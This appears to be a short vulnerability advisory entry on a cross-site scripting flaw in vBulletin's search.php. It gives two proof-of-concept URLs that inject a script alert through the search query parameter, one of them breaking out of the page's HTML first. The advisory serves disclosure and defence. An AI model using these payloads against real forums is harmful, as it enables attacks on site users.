• info
• discussion
• exploit
• solution
• references

JelSoft VBulletin Search.PHP Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>

http://www.example.com/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>